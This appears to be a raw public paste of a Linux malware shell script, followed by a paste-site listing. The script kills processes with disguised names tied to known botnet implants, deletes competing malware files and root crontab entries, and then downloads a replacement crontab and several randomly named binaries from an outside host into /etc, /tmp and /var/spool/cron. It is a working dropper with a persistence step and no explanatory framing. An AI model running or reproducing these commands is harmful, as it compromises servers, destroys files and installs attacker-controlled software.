	killall -9 syscore.sh
	killall -9 .mimeo 
	killall -9 .mimeo
	killall -9 .mimeo
	killall -9 .mimeop
	killall -9 .task1
	killall -9 .mimeop
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	killall -9 .IptabLes
	killall -9 .IptabLex
	cd /root;rm -rf dir nohup.out
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsddd.*
	cd /etc;rm -rf dir atddd.*
	cd /etc;rm -rf dir ksapdd.*
	cd /etc;rm -rf dir kysapdd.*
	cd /etc;rm -rf dir sksapdd.*
	cd /etc;rm -rf dir skysapdd.*
	cd /etc;rm -rf dir xfsdxd.*
	cd /etc;rm -rf dir fake.cfg
	cd /etc;rm -rf dir cupsdd.*
	cd /etc;rm -rf dir atdd.*
	cd /etc;rm -rf dir ksapd.*
	cd /etc;rm -rf dir kysapd.*
	cd /etc;rm -rf dir sksapd.*
	cd /etc;rm -rf dir skysapd.*
	cd /etc;rm -rf dir xfsdx.*
	cd /etc;rm -rf dir sfewfesfs
	cd /etc;rm -rf dir gfhjrtfyhuf
	cd /etc;rm -rf dir rewgtf3er4t
	cd /etc;rm -rf dir fdsfsfvff
	cd /etc;rm -rf dir smarvtd
	cd /etc;rm -rf dir whitptabil
	cd /etc;rm -rf dir gdmorpen
	cd /etc;rm -rf dir sfewfesfs.*
	cd /etc;rm -rf dir gfhjrtfyhuf.*
	cd /etc;rm -rf dir rewgtf3er4t.*
	cd /etc;rm -rf dir fdsfsfvff.*
	cd /etc;rm -rf dir smarvtd.*
	cd /etc;rm -rf dir whitptabil.*
	cd /etc;rm -rf dir gdmorpen.*
	cd /etc;rm -rf dir nhgbhhj.*
	cd /tmp;rm -rf dir 1.*
	cd /tmp;rm -rf dir 2.*
	cd /tmp;rm -rf dir 3.*
	cd /tmp;rm -rf dir 4.*
	cd /tmp;rm -rf dir 5.*
	cd /tmp;rm -rf dir jdhe
	cd /tmp;rm -rf dir jdhe.*
	cd /var/spool/cron; rm -rf dir root.*
	cd /var/spool/cron; rm -rf dir root
	cd /var/spool/cron/crontabs; rm -rf dir root.*
	cd /var/spool/cron/crontabs; rm -rf dir root
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
	yes|mv /tmp/root /var/spool/cron
	yes|mv /tmp/root /var/spool/cron/crontabs
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj

Public Pastes

Untitled
CSS | 48 sec ago | 0.25 KB
Untitled
PHP | 1 min ago | 0.26 KB
Untitled
C++ | 2 min ago | 1.83 KB
Activate Taskbar Slide-Up Animation
Autohotkey | 20 min ago | 0.14 KB
Untitled
JSON | 24 min ago | 0.06 KB
Untitled
C++ | 24 min ago | 5.73 KB
RAW
Lua | 31 min ago | 0.03 KB
ejerciciocastillo1.py
Python | 34 min ago | 3.54 KB